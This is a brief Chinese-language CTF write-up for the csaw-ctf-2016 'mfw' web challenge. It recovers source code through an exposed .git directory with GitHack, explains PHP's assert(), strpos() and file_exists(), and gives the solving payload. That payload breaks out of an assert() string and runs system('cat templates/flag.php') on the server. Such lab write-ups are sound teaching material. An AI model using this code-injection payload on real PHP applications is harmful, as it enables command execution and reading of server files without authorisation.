攻防世界Web-mfw

题目来源csaw-ctf-2016-quals

使用GitHack

assert() 检查一个断言是否为 FALSE

strpos() 函数查找字符串在另一字符串中第一次出现的位置。

file_exists() 函数检查文件或目录是否存在。

payload:

?/page=

about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag

查看网页源代码

知识：git漏洞、代码审计